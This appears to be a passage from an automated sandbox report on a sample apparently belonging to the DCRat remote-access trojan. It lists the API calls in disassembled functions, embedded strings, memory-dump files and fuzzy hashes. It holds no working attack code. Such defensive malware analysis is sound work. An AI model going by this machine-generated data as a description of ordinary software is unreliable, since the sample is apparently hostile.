                                  • EndDialog.USER32(?,00000001), ref: 008EA4B8
                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 008EA4CD
                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 008EA4E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ItemText$DialogWindow
                                  • String ID: ASKNEXTVOL
                                  • API String ID: 445417207-3402441367
                                  • Opcode ID: f75a67c836342e78b580d5052e8ea33c3127d7428d8ce7d2fab833d10c4bf30a
                                  • Instruction ID: 0d05e70896b1a7fddf38f822199808668820c5823076c18516de4ee52d109c47
                                  • Opcode Fuzzy Hash: f75a67c836342e78b580d5052e8ea33c3127d7428d8ce7d2fab833d10c4bf30a
                                  • Instruction Fuzzy Hash: 55119632258280BFDB259F99DD4DF6637A9FB87B08F104115F241DB1E0C7A1A905EB2B
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: __fprintf_l_strncpy
                                  • String ID: $%s$@%s
                                  • API String ID: 1857242416-834177443
                                  • Opcode ID: 516707569e86a8cfdddec84fff5cad69f45f6e21aa43817f1d508f972380684e
                                  • Instruction ID: 0b620bc8ab5d1e8fe6fa229981fee7de707889fa6271a60a6b1cb1b5648b7a85
                                  • Opcode Fuzzy Hash: 516707569e86a8cfdddec84fff5cad69f45f6e21aa43817f1d508f972380684e
                                  • Instruction Fuzzy Hash: B1213B7244034CAEDF209EA8CC46FEE7BA8FB05700F044622FA25D6292E771EA559B51
                                  APIs
                                    • Part of subcall function 008D130B: GetDlgItem.USER32(00000000,00003021), ref: 008D134F
                                    • Part of subcall function 008D130B: SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365
                                  • EndDialog.USER32(?,00000001), ref: 008EA9DE
                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 008EA9F6
                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 008EAA24
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ItemText$DialogWindow
                                  • String ID: GETPASSWORD1
                                  • API String ID: 445417207-3292211884
                                  • Opcode ID: 9eac97f066e18fec7d2426433d3d37980a3e2a650bddee9e861c8fc85995b5fb
                                  • Instruction ID: 40651b6cd83f32f5583b288f7d5c6de41c5652d6a82acd6804b335556f157ea7
                                  • Opcode Fuzzy Hash: 9eac97f066e18fec7d2426433d3d37980a3e2a650bddee9e861c8fc85995b5fb
                                  • Instruction Fuzzy Hash: 1F1148329542287ADB35AE669D09FFB3B7CFB4AB00F000021FA45F6181C260A954D672
                                  APIs
                                  • _swprintf.LIBCMT ref: 008DB51E
                                    • Part of subcall function 008D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D401D
                                  • _wcschr.LIBVCRUNTIME ref: 008DB53C
                                  • _wcschr.LIBVCRUNTIME ref: 008DB54C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                                  • String ID: %c:\
                                  • API String ID: 525462905-3142399695
                                  • Opcode ID: d61b5cac74bf88d379c8ff051503ee052263e7b4c93012c0eebb04c832eb737b
                                  • Instruction ID: 38637cb3c679dc09afc7c18df3007c7a652239a087d729d94577368440d77221
                                  • Opcode Fuzzy Hash: d61b5cac74bf88d379c8ff051503ee052263e7b4c93012c0eebb04c832eb737b
                                  • Instruction Fuzzy Hash: 3801F953904711FADB20ABB9AC46C7BB7BCFE953A07914617F945C6281FB30D950C2A2
                                  APIs
                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,008DABC5,00000008,?,00000000,?,008DCB88,?,00000000), ref: 008E06F3
                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,008DABC5,00000008,?,00000000,?,008DCB88,?,00000000), ref: 008E06FD
                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,008DABC5,00000008,?,00000000,?,008DCB88,?,00000000), ref: 008E070D
                                  Strings
                                  • Thread pool initialization failed., xrefs: 008E0725
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                  • String ID: Thread pool initialization failed.
                                  • API String ID: 3340455307-2182114853
                                  • Opcode ID: 086fcbdbac948507444ededba3f34c518bdc70243b2e490ae83e419e45102bee
                                  • Instruction ID: 503ac53a2eb5bb9fd3e486e196e78a8d306db47999e876fdcc375ec8fb30c36f
                                  • Opcode Fuzzy Hash: 086fcbdbac948507444ededba3f34c518bdc70243b2e490ae83e419e45102bee
                                  • Instruction Fuzzy Hash: 62115EB1605709AFD3215F6A9C84AA7FBECFBA5754F10882EF1DAC6200D6B16981CF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                  • API String ID: 0-56093855
                                  • Opcode ID: 47485d4d77dde15d2db5066c36782e2cb1491178b1b25fabc77cde5e22390df7
                                  • Instruction ID: 339eb22147198d40e71107645dc68d8584101f7f7653b46d55798eda2cfe0387
                                  • Opcode Fuzzy Hash: 47485d4d77dde15d2db5066c36782e2cb1491178b1b25fabc77cde5e22390df7
                                  • Instruction Fuzzy Hash: B301B1B1A2838AAFCB119F16ED44A977BE9F716384B008421F905D22B1DA719C54FBA1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: __alldvrm$_strrchr
                                  • String ID:
                                  • API String ID: 1036877536-0
                                  • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                  • Instruction ID: 1e425bb89ac7b263352b9e6bb8630b9fe650eff4e0324a35634413753f527f6e
                                  • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                  • Instruction Fuzzy Hash: 33A14432A0028E9FDB258E78C8917BEBBA5FF65310F144169E6D5DB381C2388942C755
                                  APIs
                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,008D80B7,?,?,?), ref: 008DA351
                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,008D80B7,?,?), ref: 008DA395
                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,008D80B7,?,?,?,?,?,?,?,?), ref: 008DA416
                                  • CloseHandle.KERNEL32(?,?,00000000,?,008D80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 008DA41D
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: File$Create$CloseHandleTime
                                  • String ID:
                                  • API String ID: 2287278272-0
                                  • Opcode ID: 7a665dc0e62381c6ccde80a756d6449ccb12d019d933277eaa2f5a0fe86104e6
                                  • Instruction ID: 60f68267b08a51866f2dc5c64fcf8a923eb5f2dc17c2415b5f847d0dc28b35c5
                                  • Opcode Fuzzy Hash: 7a665dc0e62381c6ccde80a756d6449ccb12d019d933277eaa2f5a0fe86104e6
                                  • Instruction Fuzzy Hash: 3941F0302483849ED739DF24CC45BAEBBE9FB81700F244A1EB5D0D3280C7A49A48DB53
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008F89AD,?,00000000,?,00000001,?,?,00000001,008F89AD,?), ref: 008FC0E6
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008FC16F
                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008F67E2,?), ref: 008FC181
                                  • __freea.LIBCMT ref: 008FC18A
                                    • Part of subcall function 008F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008FC13D,00000000,?,008F67E2,?,00000008,?,008F89AD,?,?,?), ref: 008F854A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                  • String ID:
                                  • API String ID: 2652629310-0
                                  • Opcode ID: 078ae94a48fce10cd9b37ae0c365a8791f3281fe23796db20cf8960189a83ed7
                                  • Instruction ID: 718d57a0c92f56142ec0fd04d24441fd9f5314692dc12fa50afcbfe8931f8b13
                                  • Opcode Fuzzy Hash: 078ae94a48fce10cd9b37ae0c365a8791f3281fe23796db20cf8960189a83ed7
                                  • Instruction Fuzzy Hash: AD31BD72A1021EABDB248F79DC41DBE7BA9FB44710F144128FD04D6291EB35CEA0CBA0
                                  APIs
                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 008F251A
                                    • Part of subcall function 008F2B52: ___AdjustPointer.LIBCMT ref: 008F2B9C
                                  • _UnwindNestedFrames.LIBCMT ref: 008F2531
                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 008F2543
                                  • CallCatchBlock.LIBVCRUNTIME ref: 008F2567
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                  • String ID:
                                  • API String ID: 2633735394-0
                                  • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                  • Instruction ID: 32be65a879a8bca8522c50a774c50e8931f854401530ad06c7962d59bfe88381
                                  • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                  • Instruction Fuzzy Hash: E201173200010CBBCF129F69CC11EEA3BBAFF59714F158014FE18A6121C336E961EBA1
                                  APIs
                                  • GetDC.USER32(00000000), ref: 008E9DBE
                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 008E9DCD
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008E9DDB
                                  • ReleaseDC.USER32(00000000,00000000), ref: 008E9DE9
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: CapsDevice$Release
                                  • String ID:
                                  • API String ID: 1035833867-0
                                  • Opcode ID: c2d556497a490b49f9788243caa9973bd9e35e61121ea32fccf51aada299811e
                                  • Instruction ID: 4db97b48e3dd016f438005972afe9ca19ca1363808c306c06329eb83b998b1d0
                                  • Opcode Fuzzy Hash: c2d556497a490b49f9788243caa9973bd9e35e61121ea32fccf51aada299811e
                                  • Instruction Fuzzy Hash: D3E0EC31AAD621A7D3241BA5BC0DB8B3B55EB09712F054005F605961E0DA704449EF94
                                  APIs
                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 008F2016
                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 008F201B
                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 008F2020
                                    • Part of subcall function 008F310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 008F311F
                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 008F2035
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                  • String ID:
                                  • API String ID: 1761009282-0
                                  • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                  • Instruction ID: 6022b8315d043b20b473f3763844052ac6b69f390ab3875750268a405785b26e
                                  • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                  • Instruction Fuzzy Hash: 32C04C26005A4CE41C113ABE71031BE2740FCB37C4B9220C2FB80D7243DE060A5AA07B
                                  APIs
                                    • Part of subcall function 008E9DF1: GetDC.USER32(00000000), ref: 008E9DF5
                                    • Part of subcall function 008E9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 008E9E00
                                    • Part of subcall function 008E9DF1: ReleaseDC.USER32(00000000,00000000), ref: 008E9E0B
                                  • GetObjectW.GDI32(?,00000018,?), ref: 008E9F8D
                                    • Part of subcall function 008EA1E5: GetDC.USER32(00000000), ref: 008EA1EE
                                    • Part of subcall function 008EA1E5: GetObjectW.GDI32(?,00000018,?), ref: 008EA21D
                                    • Part of subcall function 008EA1E5: ReleaseDC.USER32(00000000,?), ref: 008EA2B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ObjectRelease$CapsDevice
                                  • String ID: (
                                  • API String ID: 1061551593-3887548279
                                  • Opcode ID: 630eef70a8e63539581618333426753e506252d643a026c41d397c8fda4185ea
                                  • Instruction ID: 4437144addd64e1d7596589ac262ba55678c906a82a7209624d86fb45b508636
                                  • Opcode Fuzzy Hash: 630eef70a8e63539581618333426753e506252d643a026c41d397c8fda4185ea
                                  • Instruction Fuzzy Hash: 0C812171218754AFC714DF69C844A2ABBE9FFC9B04F00891DF99AD7260CB31AD05DB62
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: _swprintf
                                  • String ID: %ls$%s: %s
                                  • API String ID: 589789837-2259941744
                                  • Opcode ID: be12c5bf10ee410c84ab8094f367b4a3a43a2fb45182838760e88e425fc9054e
                                  • Instruction ID: 616900fd773d8987ed741c50acdf36f745e19e2b1aadd203007f0d917a75bb32
                                  • Opcode Fuzzy Hash: be12c5bf10ee410c84ab8094f367b4a3a43a2fb45182838760e88e425fc9054e
                                  • Instruction Fuzzy Hash: 2551B33124C7C9FAEE211AEACD46F267665F706B04F204D16F79AF44D1CAF294E06A03
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008D7730
                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008D78CC
                                    • Part of subcall function 008DA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,008DA27A,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA458
                                    • Part of subcall function 008DA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,008DA27A,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA489
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: File$Attributes$H_prologTime
                                  • String ID: :
                                  • API String ID: 1861295151-336475711
                                  • Opcode ID: 9a911b607d96bea85ebc77a4cf57a18e6bb6a1c1efba3a654ac58734a1fc50b9
                                  • Instruction ID: 5a5f8e2cfd3044cfa9c639fcd7ccb247efdc783da1b2e46cd35caf72b1cfeea5
                                  • Opcode Fuzzy Hash: 9a911b607d96bea85ebc77a4cf57a18e6bb6a1c1efba3a654ac58734a1fc50b9
                                  • Instruction Fuzzy Hash: EE418471805258AADB24EB54DD45EEEB37CFF45300F0042ABB649E2292EB745F84DF62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UNC$\\?\
                                  • API String ID: 0-253988292
                                  • Opcode ID: fc059c1321505fc4e23ef2cdf4ed4734bb39d001e8749b5e7a786c2194c065e9
                                  • Instruction ID: b04277af76edf1b6765d6fd5a09ce18e21a7be9e437e634b4fd046cd806abd24
                                  • Opcode Fuzzy Hash: fc059c1321505fc4e23ef2cdf4ed4734bb39d001e8749b5e7a786c2194c065e9
                                  • Instruction Fuzzy Hash: E141BC3584025DEBCB20AF25CC41EAB77ADFF84390B128267F915E7352EB30DA40DA61
                                  APIs
                                  Strings
                                  Memory Dump Source
